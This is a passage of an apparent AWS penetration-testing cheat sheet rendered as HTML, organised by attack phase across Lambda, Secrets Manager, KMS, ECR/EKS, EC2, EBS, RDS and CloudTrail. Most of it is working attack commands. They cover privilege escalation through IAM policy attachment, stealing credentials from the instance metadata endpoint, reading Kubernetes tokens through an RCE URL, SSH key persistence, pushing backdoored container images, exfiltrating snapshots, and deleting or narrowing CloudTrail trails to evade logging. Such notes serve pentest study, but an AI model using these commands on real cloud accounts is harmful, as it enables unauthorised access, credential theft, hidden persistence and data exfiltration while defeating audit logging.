<span class="n">iam</span> <span class="o">=</span> <span class="n">boto3</span><span class="p">.</span><span class="n">client</span><span class="p">(</span><span class="s">"iam"</span><span class="p">)</span>
<span class="n">iam</span><span class="p">.</span><span class="n">attach</span><span class="p">.</span><span class="n">role</span><span class="p">.</span><span class="n">policy</span><span class="p">(</span><span class="n">RoleName</span><span class="o">=</span><span class="s">"name"</span><span class="p">,</span><span class="n">PolicyArn</span><span class="o">=</span><span class="s">"arn"</span><span class="p">,)</span>
<span class="n">iam</span><span class="p">.</span><span class="n">attach</span><span class="p">.</span><span class="n">user</span><span class="p">.</span><span class="n">policy</span><span class="p">(</span><span class="n">UserName</span><span class="o">=</span><span class="s">"name"</span><span class="p">,</span><span class="n">PolicyArn</span><span class="o">=</span><span class="s">"arn"</span><span class="p">,)</span>
<span class="k">return</span> <span class="p">{</span>
<span class="s">'statusCode'</span><span class="p">:</span><span class="mi">200</span>
<span class="s">'body'</span><span class="p">:</span><span class="n">json</span><span class="p">.</span><span class="n">dumps</span><span class="p">(</span><span class="s">"Pwned"</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="invoke-a-lambda-function">Invoke a lambda function</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda invoke --function-name name response.json --region region
</code></pre></div></div>
<h3 id="listing-managed-policies-to-see-if-the-change-worked">Listing managed policies to see if the change worked</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-user-policies --user-name user_name
</code></pre></div></div>
<h1 id="aws-secret-manager">AWS Secret Manager</h1>
<ul>
<li>AWS Service that encrypts and store secrets</li>
<li>Transparently decrypts and return in plaintext</li>
<li>KMS used to store keys (AWS Key and Customer Managed Key)</li>
<li>Asymmetric and Symmetric keys can be created using KMS</li>
</ul>
<h2 id="enumeration-2">Enumeration</h2>
<h3 id="listing-all-secrets-stored-by-secret-manager">Listing all secrets stored by Secret Manager</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws secretsmanager list-secrets
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-secret">Listing information about a specific secret</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws secretsmanager describe-secret --secret-id name
</code></pre></div></div>
<h3 id="getting-policies-attached-to-the-specified-secret">Getting policies attached to the specified secret</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws secretsmanager get-resource-policy --secret-id ID
</code></pre></div></div>
<h3 id="listing-keys-in-kms">Listing keys in KMS</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms list-keys
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-key">Listing information about a specific key</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms describe-key --key-id ID
</code></pre></div></div>
<h3 id="listing-policies-attached-to-a-specific-key">Listing policies attached to a specific key</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms list-key-policies --key-id ID
</code></pre></div></div>
<h3 id="getting-full-information-about-a-policy">Getting full information about a policy</h3>
<ul>
<li>Shows who can access the keys</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms get-key-policy --policy-name name --key-id ID
</code></pre></div></div>
<h2 id="credential-exfiltration">Credential Exfiltration</h2>
<ul>
<li>If the user has access to Secret Manager, it can decrypt the secrets using the web, cli or API</li>
</ul>
<h3 id="listing-policies-attached-to-an-user">Listing policies attached to an user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-user-policies --user-name name
</code></pre></div></div>
<h3 id="retrieving-information-about-a-specific-version-of-policy">Retrieving information about a specific version of policy</h3>
<ul>
<li>Here we can see the permissions</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn arn --version-id id
</code></pre></div></div>
<h3 id="listing-all-secrets-stored-by-secret-manager-1">Listing all secrets stored by Secret Manager</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws secretsmanager list-secrets
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-secret-1">Listing information about a specific secret</h3>
<ul>
<li>Here we get the secret Key Id to descript the secret</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws secretsmanager describe-secret --secret-id name
</code></pre></div></div>
<h3 id="getting-resource-based-policy-attached-to-an-specific-secret">Getting resource-based policy attached to an specific secret</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws secretsmanager get-resource-policy --secret-id ID
</code></pre></div></div>
<h3 id="getting-the-secret-value">Getting the secret value</h3>
<ul>
<li>Retrieves the actual value</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws secretsmanager get-secret-value --secret-id ID
</code></pre></div></div>
<h3 id="kms">KMS</h3>
<ul>
<li>If we compromised as an example an S3 with an encrypted file, we can decrypt it using the keys stored in KMS.</li>
</ul>
<h4 id="listing-an-specific-key">Listing an specific key</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms describe-key --key-id id
</code></pre></div></div>
<h4 id="listing-policies-attached-to-an-specified-key">Listing policies attached to an specified key</h4>
<ul>
<li>Here we can see who can access the key, the description of it and so on</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms list-key-policies --key-id ID
</code></pre></div></div>
<h4 id="listing-full-information-about-a-policy">Listing full information about a policy</h4>
<ul>
<li>Run the previous command in all keys to see who can access it</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms get-key-policy --policy-name name --key-id ID
</code></pre></div></div>
<h4 id="decrypt-the-secret-using-the-key">Decrypt the secret using the key</h4>
<ul>
<li>There is no need to specificy the key information because this information is embbeded in the encrypted file</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query plaintext
</code></pre></div></div>
<h1 id="containers">Containers</h1>
<p>Divided into three categories</p>
<ul>
<li>Registry -> Secure place to store container images (ECR)</li>
<li>Orchestration -> Configure when and where the containters run (ECS,EKS)</li>
<li>Compute -> Use to do computing related tasks (EC2, Fargate)</li>
<li>Its possible to create a backdoor image and add to a EKS cluster</li>
<li>Always look how VPC’s are communicatig with each other, maybe is possible to pivot through the EKS VPC from other VPC and compromise the entire cluster</li>
</ul>
<h2 id="initial-access-1">Initial Access</h2>
<ul>
<li>The initial access can be done by exploiting some RCE in webapp to get access to the container, afterwards its possible to compromise the EC2.</li>
</ul>
<p>After the RCE, we can list all secrets in EKS</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://website.com?rce.php?cmd=ls /var/run/secrets/kubernets.io/serviceaccount
</code></pre></div></div>
<h3 id="getting-the-secret-information-from-eks">Getting the secret information from EKS</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://website.com?rce.php?cmd=ls /var/run/secrets/kubernets.io/serviceaccount/token
</code></pre></div></div>
<ul>
<li>It’s also possible to do sandbox escaping (Tool: <code class="language-plaintext highlighter-rouge">deepce</code>)</li>
</ul>
<h2 id="enumeration-3">Enumeration</h2>
<h3 id="ecr">ECR</h3>
<h4 id="listing-all-repositories-in-container-registry">Listing all repositories in container registry</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr describe-repositories
</code></pre></div></div>
<h4 id="listing-information-about-repository-policy">Listing information about repository policy</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr get-repository-policy --repository-name name
</code></pre></div></div>
<h4 id="listing-all-images-in-a-specific-repository">Listing all images in a specific repository</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr list-images --repository-name name
</code></pre></div></div>
<h4 id="listing-information-about-an-image">Listing information about an image</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr describe-images --repository-name name --images-ids imageTag=name
</code></pre></div></div>
<h3 id="ecs">ECS</h3>
<h4 id="listing-all-ecs-clusters">Listing all ECS clusters</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecs list-clusters
</code></pre></div></div>
<h4 id="listing-information-about-an-specific-cluster">Listing information about an specific cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecs describe-clusters --cluster name
</code></pre></div></div>
<h4 id="listing-all-services-in-specified-cluster">Listing all services in specified cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecs list-services --cluster name
</code></pre></div></div>
<h4 id="listing-information-about-an-specific-service">Listing information about an specific service</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecs descibe-services --cluster name --services name
</code></pre></div></div>
<ul>
<li>This command shows the logs of the service</li>
</ul>
<h4 id="listing-tasks-in-specific-cluster">Listing tasks in specific cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecs list-tasks --cluster name
</code></pre></div></div>
<h4 id="listing-information-about-an-specific-task">Listing information about an specific task</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecs describe-tasks --cluster name -tasks taskArn
</code></pre></div></div>
<ul>
<li>Also shows information about network, userful if trying to pivot</li>
</ul>
<h4 id="listing-all-containers-in-specified-cluster">Listing all containers in specified cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecs list-container-instances --cluster name
</code></pre></div></div>
<h3 id="eks">EKS</h3>
<h4 id="listing-all-eks-clusters">Listing all EKS clusters</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks list-clusters
</code></pre></div></div>
<h4 id="listing-information-about-an-specific-cluster-1">Listing information about an specific cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks describe-cluster --name name
</code></pre></div></div>
<h4 id="listing-all-node-groups-in-specified-cluster">Listing all node groups in specified cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks list-nodegroups --cluster-name name
</code></pre></div></div>
<h4 id="listing-specific-information-about-a-node-group-in-a-cluster">Listing specific information about a node group in a cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks describe-nodegroup --cluster-name name --nodegroup-name name
</code></pre></div></div>
<h4 id="listing-fargate-in-specified-cluster">Listing Fargate in specified cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks list-fargate-profiles --cluster-name cluster-name
</code></pre></div></div>
<h4 id="listing-information-about-a-fargate-profile-in-a-cluster">Listing information about a fargate profile in a cluster</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws eks describe-fargate-profiles --cluster-name name --fargate-profile-name name
</code></pre></div></div>
<h2 id="persistence-1">Persistence</h2>
<ul>
<li>It’s possible to modify an existing docker image with a backdoor, when this image is used it will trigger our team server.</li>
</ul>
<h3 id="enumerating-the-user">Enumerating the user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<h3 id="listing-manager-policies-attached-to-the-iam-role">Listing manager policies attached to the IAM role</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-role-policies --role-name name
</code></pre></div></div>
<h3 id="getting-information-about-the-version-of-the-managed-policy">Getting information about the version of the managed policy</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn arn --version-id id
</code></pre></div></div>
<h3 id="getting-information-about-the-repositories-in-container-registry">Getting information about the repositories in container registry</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr describe-repositories
</code></pre></div></div>
<h3 id="listing-all-images-in-the-repository">Listing all images in the repository</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr list-images --repository-name name
</code></pre></div></div>
<h3 id="listing-information-about-an-image-1">Listing information about an image</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr describe-images --repository-name name --image-ids imageTag=Name
</code></pre></div></div>
<h3 id="authenticate-the-docker-daemon-to-ecr">Authenticate the docker daemon to ECR</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ecr get-login-password --region region | docker login --username AWS --password-stdin ecr_address
</code></pre></div></div>
<h3 id="building-images-with-backdoor">Building images with backdoor</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker build -t image_name
</code></pre></div></div>
<h3 id="tagging-the-docker-image">Tagging the docker image</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker tag image_name ecr_addr:Image_Name
</code></pre></div></div>
<h3 id="pushing-the-image-to-ecr">Pushing the image to ECR</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker push ecr_addr:Image_Name
</code></pre></div></div>
<h1 id="ec2">EC2</h1>
<ul>
<li>AMI, images used to create virtual machines</li>
<li>It’s possible to create a malicious image to compromise users</li>
<li>We can access an instance using SSH Keys, EC2 Instance Connect, Session Manager</li>
<li>The SSH Key method is permanent, we need to gather the private key to connect to the instance</li>
<li>EC2 Instance connect is an IAM right that we can add to a user, enabling us to temporarily connect to an instance</li>
<li>Session manager only work in browser and it does not need SSH Key</li>
<li>Windows machines can be accessed by using RDP, Session Manager</li>
<li>Security Groups acts as a virtual firewall to control inbound and outbound traffic, acts at the instance level, not the subnet level.</li>
</ul>
<h2 id="enumeration-4">Enumeration</h2>
<h3 id="listing-information-about-all-instances">Listing information about all instances</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-instances
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-region">Listing information about a specific region</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-instances --region region
</code></pre></div></div>
<h3 id="listing-information-about-specific-instance">Listing information about specific instance</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-instances --instance-ids ID
</code></pre></div></div>
<h3 id="extracting-userdata-attribute-of-specified-instance">Extracting UserData attribute of specified instance</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-instance-attribute --attribute userData --instance-id instanceID
</code></pre></div></div>
<p><em>This command gathers the metadata from the instance, like commands or secrets. The output is base64 encoded</em></p>
<h3 id="listing-roles-of-an-instance">Listing roles of an instance</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-iam-instance-profile-associations
</code></pre></div></div>
<h2 id="exploitation-1">Exploitation</h2>
<ul>
<li>Initial access can happen by RCE or SSRF</li>
<li>Metadata can be used to exfiltrate information from the instance</li>
</ul>
<h3 id="remote-code-execution">Remote code execution</h3>
<h4 id="aws-metadata">AWS Metadata</h4>
<p>If we have remote code execution or SSRF, we can grab metadata information</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://169.254.169.254/latest/meta-data
</code></pre></div></div>
<h5 id="grabbing-the-keys-to-access-the-instance">Grabbing the keys to access the instance</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
</code></pre></div></div>
<h5 id="grabbing-the-keys-in-metadata-version-2">Grabbing the keys in metadata version 2</h5>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">TOKEN</span><span class="o">=</span><span class="sb">`</span>curl
X PUT <span class="s2">"http://169.254.169.254/latest/ api /token"</span> H <span class="s2">"X-aws-ec2-metadata-token-ttl-seconds: 21600"</span><span class="sb">`</span>
<span class="o">&&</span> curl H <span class="s2">"X-aws-ec2-metadata-token: </span><span class="nv">$TOKEN</span><span class="s2">"</span> v http://169.254.169.254/latest/meta-data/
</code></pre></div></div>
<h4 id="aws-userdata">AWS Userdata</h4>
<p>Version 1</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://169.254.169.254/latest/user-data/
</code></pre></div></div>
<p>Version 2</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">TOKEN</span><span class="o">=</span><span class="sb">`</span>curl
X PUT <span class="s2">"http://169.254.169.254/latest/ api /token"</span> H <span class="s2">"X-aws-ec2-metadata-token-ttl-seconds: 21600"</span><span class="sb">`</span>
<span class="o">&&</span> curl H <span class="s2">"X-aws-ec2-metadata-token: </span><span class="nv">$TOKEN</span><span class="s2">"</span> v http://169.254.169.254/latest/user-data/
</code></pre></div></div>
<h3 id="privilege-escalation-2">Privilege Escalation</h3>
<ul>
<li>One approach to get a shell in a instance is to put a reverse shell in UserData attribute, when the instance is launched, we will have the connection.</li>
<li>Another approach happens when we have the iam:PassRole and iam:AmazonEC2FullAccess permissions, we can add an administrator role to the compromised EC2 instance and access aws services.</li>
</ul>
<h4 id="getting-information-about-the-key">Getting information about the key</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<h4 id="getting-policies-attached-to-the-iam-user">Getting policies attached to the IAM user</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-user-policies --user-name user_name
</code></pre></div></div>
<h4 id="getting-information-about-a-specific-policy-version">Getting information about a specific policy version</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn ARN --version-id ID
</code></pre></div></div>
<p>To attach a role to an EC2 instance, we can use the RCE to grab the ID</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://169.254.169.254/latest/meta-data/instance-id
</code></pre></div></div>
<h4 id="listing-instance-profiles">Listing instance profiles</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-instance-profiles
</code></pre></div></div>
<h4 id="attach-an-instance-profile-to-an-ec2-instance">Attach an instance profile to an EC2 instance</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 associate-iam-instance-profile --instance-id ID --iam-instance-profile Name=ProfileName
</code></pre></div></div>
<h3 id="credential-access-1">Credential Access</h3>
<ul>
<li>We can grab the credentials by abusing metadata (Web Application with SSRF,RCE and so on)</li>
</ul>
<h4 id="after-the-initial-access">After the initial access</h4>
<ol>
<li>Enumerate the key (Role)</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<ol>
<li>If there are roles associated with the key, we can grab the credentials by issuing a request to the metadata endpoint (v1 or v2)</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_OF_PREVIOUS_COMMAND
</code></pre></div></div>
<ol>
<li>Configure the aws cli</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws configure
</code></pre></div></div>
<p>Or use enviroment variables.</p>
<h3 id="persistence-2">Persistence</h3>
<ul>
<li>All the persistence techniques works here, SSH persistence, vim backdoor and so on.</li>
</ul>
<h4 id="ssh-persistence-example">SSH Persistence example</h4>
<ol>
<li>Generate SSH Key pair</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh-keygen
</code></pre></div></div>
<ol>
<li>Add public key to authorized_keys</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>echo "PUBLIC_Key" >> /home/user/.ssh/authorized_keys
</code></pre></div></div>
<ol>
<li>Use the private key to connect</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh -i public_key user@instance
</code></pre></div></div>
<h1 id="elastic-block-store">Elastic Block Store</h1>
<ul>
<li>Block storage system used to store persistent data</li>
<li>It’s possible to attach this drive to EC2 and increase the storage (Like and HD, but scalable).</li>
<li>It’s possible to create a snapshot (It will be saved on S3) and create a volume from this snapshot.</li>
<li>It’s possible to attach the snapshot (Backup of BS) to an EC2 instance</li>
<li>Snapshots can be used as volumes or AMI’s</li>
</ul>
<h2 id="enumeration-5">Enumeration</h2>
<h3 id="enumerating-ebs-volumes">Enumerating EBS volumes</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-volumes
</code></pre></div></div>
<ul>
<li>If the volume is available, it can be attached to an EC2 instance</li>
<li>Check if the EBS is encrypted</li>
</ul>
<h3 id="enumerating-snapshots">Enumerating Snapshots</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-snapshots --owner-ids self
</code></pre></div></div>
<ul>
<li>Also check if the snapshot is encrypted</li>
</ul>
<h2 id="exploitation--data-exfiltration">Exploitation & Data Exfiltration</h2>
<ul>
<li>Create a snapshot of an EC2 instance, create a volume from snapshot and attach to other EC2 instance.</li>
<li>User need to have IAM permissions on EC2</li>
<li>Maybe we don’t have the right to access the instance but have rights to create a snapshot and attach it to another machine.</li>
</ul>
<h3 id="creating-a-snapshot-of-a-specified-volume">Creating a snapshot of a specified volume</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 create-snapshot --volume volumeID --description "Example" --profile profile_name
</code></pre></div></div>
<h3 id="listing-snapshots">Listing snapshots</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-snapshots
</code></pre></div></div>
<h3 id="creating-a-volume-from-a-snasphot">Creating a volume from a snasphot</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 create-volume --snapshot-id ID --availability-zone ZONE --profile profile_name
</code></pre></div></div>
<ul>
<li>The volume needs to be in the same availability zone as the instance we have access</li>
</ul>
<h3 id="attaching-the-volume-to-an-instance">Attaching the volume to an instance</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 attach-volume --volume-id VolumeID --instance-id InstanceID --device /dev/sdfd -> Can be other value
</code></pre></div></div>
<h3 id="mounting-the-volume">Mounting the volume</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo mount /dev/sdfd /directory
</code></pre></div></div>
<p>After mounting, we will have access to the disk.</p>
<h1 id="rds---relational-database-service">RDS - Relational Database Service</h1>
<ul>
<li>Service to use, operate and scale relational databases in AWS (MariaDB, MySQL and similar)</li>
<li>The access is done by using password, password+IAM or password+kerberos</li>
<li>It’s possible to restrict access using restriction such as specific EC2 or lambda or use network level restriction such as vpc, ip.</li>
<li>RDS Proxy hadles the traffic between the application and the database, it enables the enforcing of IAM permissions and use secrets manager to store credentials.</li>
</ul>
<h2 id="enumeration-6">Enumeration</h2>
<h3 id="listing-information-about-clusters-in-rds">Listing information about clusters in RDS</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws rds describe-db-clusters
</code></pre></div></div>
<h3 id="listing-information-about-rds-instances">Listing information about RDS instances</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws rds describe-db-instances
</code></pre></div></div>
<ul>
<li>IAMDatabaseAuthenticationEnabled: false -> Need password to access the instance</li>
</ul>
<h3 id="listing-information-about-subnet-groups-in-rds">Listing information about subnet groups in RDS</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws rds describe-db-subnet-groups
</code></pre></div></div>
<h3 id="listing-information-about-database-security-groups-in-rds">Listing information about database security groups in RDS</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws rds describe-db-security-groups
</code></pre></div></div>
<h3 id="listing-information-about-database-proxies">Listing information about database proxies</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws rds describe-db-proxies
</code></pre></div></div>
<h2 id="data-exfiltration-1">Data exfiltration</h2>
<ul>
<li>If the instance is in a security group or VPC, we need to compromise it first to access the database (For example, we compromise an EC2 instance in the same VPC, then its possible to connect)</li>
</ul>
<h3 id="list-instances-in-rds">List instances in RDS</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws rds describe-db-instances
</code></pre></div></div>
<h3 id="list-information-about-the-specified-security-group">List information about the specified security group</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws ec2 describe-security-groups --group-ids id
</code></pre></div></div>
<h3 id="password-based-authentication">Password based authentication</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mysql -h hostname -u name -P port -p password
</code></pre></div></div>
<h3 id="iam-based-authentication">IAM Based authentication</h3>
<p><strong>1. Identify the user</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<p><strong>2. List all policies attached to a role</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-role-policies --role-name name
</code></pre></div></div>
<p><strong>3. Get information about a specific version of a policy</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn arn --version-id ID
</code></pre></div></div>
<p><strong>4. Get a temporary token from the RDS</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws rds generate-db-auth-token --hostname hostname --port port --username username --region region
</code></pre></div></div>
<ul>
<li>To be easier, we can put it in a variable</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TOKEN=$(aws rds generate-db-auth-token --hostname hostname --port port --username username --region region)
</code></pre></div></div>
<p><strong>5. Connect to the DB using the token</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mysql -h hostname -u name -P port --enable-cleartext-plugin --user=user --password=$TOKEN
</code></pre></div></div>
<h1 id="sso--other-services">SSO & Other Services</h1>
<h2 id="single-sign-on-sso">Single Sign On (SSO)</h2>
<ul>
<li>Used to centrally manage access to multiple AWS accounts and applications.</li>
<li>Provide users a way to interact with all services and applications through one place</li>
<li>Can be used to manage access and user permissions to all AWS accounts</li>
<li>The identity source can use AWS SSO’s identity store or external identity store (Okta,SAML and similar)</li>
</ul>
<h2 id="cloudtrail">CloudTrail</h2>
<ul>
<li>Log monitoring service, allow us to continuously monitor and retain account activity related to actions in our AWS account</li>
<li>Provide event history of AWS account activity, SDKs, command line tools and other services</li>
<li>Commonly used to detect unsual behavior in AWS account</li>
<li>Pacu automatically changes the user agent to deceive the logs of cloudtrail</li>
</ul>
<h3 id="userful-commands">Userful Commands</h3>
<h4 id="list-trails">List trails</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws cloudtrail list-trails
</code></pre></div></div>
<h4 id="disabling-cloudtrail">Disabling CloudTrail</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws cloudtrail delete-trail --name example_trail --profile name
</code></pre></div></div>
<h4 id="disable-monitoring-of-events-from-global-events">Disable monitoring of events from global events</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws cloudtrail update-trail --name example_trail --no-include-global-service-event
</code></pre></div></div>
<h4 id="disable-cloudtrail-on-specific-regions">Disable CloudTrail on specific regions</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws cloudtrail update-trail --name example_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</code></pre></div></div>
<h2 id="aws-shield">AWS Shield</h2>
<ul>
<li>Used to protect services from Denial of Service Attacks</li>
<li>There are 2 versions, the standard and the Advanced</li>
</ul>
<h2 id="aws-waf">AWS Waf</h2>
<ul>
<li>Used to protect applications against common web application attacks</li>
<li>Common WAF bypasses can be tested against it</li>
<li>To detect an WAF, we can use <code class="language-plaintext highlighter-rouge">wafw00f</code></li>
</ul>
<h2 id="aws-inspector">AWS Inspector</h2>
<ul>
<li>Automated security assessment service that helps improve the security and compliance of applications on AWS</li>
<li>Works with an agent</li>
</ul>
<h2 id="aws-guard-duty">AWS Guard Duty</h2>
<ul>
<li>Threat detection service that monitors for malicious activity and unauthorized behavior</li>
<li>Works by collecting and analyzing logs</li>
</ul>
<h1 id="virtual-private-cloud">Virtual Private Cloud</h1>
<ul>
<li>Used to create an isolated infrastructure within the cloud, including subnets and so on.</li>
<li>If the VPC has an internet gateway, means its a public subnet</li>
<li>Every VPC can have Network ACL’s</li>
</ul>
<h2 id="routing-tables">Routing Tables</h2>
<p>A set of rules to determine where the traffic will be directed, comes in form of Destination and Target, defined as follows</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DESTINATION TARGET
